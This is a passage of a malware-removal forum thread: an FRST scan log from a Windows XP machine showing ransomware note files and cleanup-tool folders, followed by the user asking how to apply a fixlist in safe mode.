2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 09:33 - 2014-07-24 22:59 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-22 22:50 - 2014-08-04 17:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-07-22 22:50 - 2014-07-23 17:47 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 17:20 - 2014-08-06 16:26 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-07 17:20 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp
2014-08-07 17:19 - 2014-08-06 13:51 - 00000000 ____D () C:\FRST
2014-08-07 17:18 - 2012-08-20 19:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-08-07 17:18 - 2008-04-14 13:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-07 17:11 - 2014-08-04 17:04 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-07 17:11 - 2014-08-04 16:56 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-07 17:11 - 2012-08-22 11:16 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-08-07 17:11 - 2012-08-20 19:07 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-07 16:26 - 2014-08-07 16:23 - 00000000 ___SD () C:\ComboFix
2014-08-07 14:48 - 2014-08-04 17:04 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-07 14:48 - 2014-08-01 09:51 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-07 14:47 - 2012-08-20 19:10 - 00000098 ___SH () C:\Documents and Settings\Konstantine Trivizas\ntuser.ini
2014-08-07 14:31 - 2014-08-05 15:43 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-07 14:31 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-07 14:29 - 2012-08-22 10:36 - 00011994 _____ () C:\WINDOWS\system32\nvModes.001
2014-08-07 14:29 - 2004-10-26 12:01 - 00017112 _____ () C:\WINDOWS\system32\nvapps.xml
2014-08-07 14:25 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas
2014-08-07 14:24 - 2012-10-16 19:18 - 00000308 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:22 - 2013-02-21 00:09 - 00000910 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-07 14:22 - 2013-01-02 19:40 - 00000308 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:21 - 2014-08-04 17:04 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-07 14:20 - 2012-08-22 04:48 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978695_WM9$
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2012-08-20 16:12 - 00000327 __RSH () C:\boot.ini
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:03 - 2013-02-21 00:09 - 00000914 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-07 11:50 - 2012-08-23 12:38 - 00001038 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001UA.job
2014-08-07 11:49 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-08-07 11:42 - 2014-08-07 11:41 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:32 - 2014-08-06 16:31 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:24 - 2014-08-04 17:11 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-06 15:51 - 2012-08-23 12:38 - 00000986 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001Core.job
2014-08-06 14:38 - 2014-08-06 14:37 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-05 18:29 - 2014-08-04 17:10 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-05 17:15 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 17:15 - 2012-08-22 04:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:39 - 2014-08-05 12:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-05 15:38 - 2014-08-05 14:02 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:34 - 2014-08-05 15:33 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:12 - 2013-01-02 19:40 - 00000316 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-05 13:41 - 2014-08-05 13:40 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:41 - 2014-08-05 13:32 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:37 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\system32\mui
2014-08-05 13:36 - 2014-08-05 13:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:42 - 2012-08-22 04:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971657$
2014-08-05 12:41 - 2012-08-22 16:05 - 00131072 _____ () C:\WINDOWS\system32\config\OAlerts.evt
2014-08-04 17:48 - 2008-04-14 13:00 - 00000582 _____ () C:\WINDOWS\win.ini
2014-08-04 17:48 - 2008-04-14 13:00 - 00000227 _____ () C:\WINDOWS\system.ini
2014-08-04 17:39 - 2012-08-22 05:04 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB959426$
2014-08-04 17:37 - 2012-08-22 16:43 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Adobe
2014-08-04 17:15 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 17:02 - 2014-08-04 16:54 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 17:00 - 2014-08-04 16:59 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 12:03 - 2012-08-24 10:26 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\CAREER & INCOME
2014-08-04 11:10 - 2012-08-28 20:01 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\AEOLUS HOSPITALITY
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 10:48 - 2013-02-04 20:06 - 00000000 ____D () C:\WINDOWS\Minidump
2014-08-01 10:14 - 2014-08-01 09:51 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:55 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Skype
2014-08-01 09:52 - 2012-08-22 12:28 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-01 09:50 - 2014-08-01 09:43 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:50 - 2014-08-01 09:42 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:49 - 2013-01-02 19:40 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\RealNetworks
2014-08-01 09:49 - 2012-10-16 19:16 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Real
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2014-08-01 09:47 - 2013-01-02 19:38 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RealNetworks
2014-08-01 09:47 - 2012-08-20 18:59 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-01 09:46 - 2012-10-16 19:11 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Real
2014-08-01 09:42 - 2014-08-01 09:40 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:42 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\Help
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-30 18:30 - 2012-10-16 19:18 - 00000316 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-07-30 10:04 - 2012-09-03 19:24 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-24 23:21 - 2012-08-23 12:40 - 00002393 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Google Chrome.lnk
2014-07-24 23:10 - 2012-08-23 12:37 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google
2014-07-24 22:59 - 2014-07-23 09:33 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-24 21:06 - 2014-07-24 20:44 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 21:03 - 2013-11-01 13:17 - 00000000 ___HD () C:\DrFoneForAndroid
2014-07-24 21:03 - 2012-08-23 11:06 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 17:47 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
Some content of TEMP:
====================
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\70253a8e-3c9f-4d22-bd36-b8d19f4791c5.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\71e80baa-31c7-4340-91d3-25d57739bca6.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\catchme.dll
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\f47520ff-a754-403a-a719-51c1c4b8b4fd.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\jre-7u65-windows-i586-iftw.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End Of Log ============================

Share this post


Link to post
Share on other sites

So  will copy the fixlist.txt from this pc to the other via usb and i will then run it and fix. All of that possible in safe mode?

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.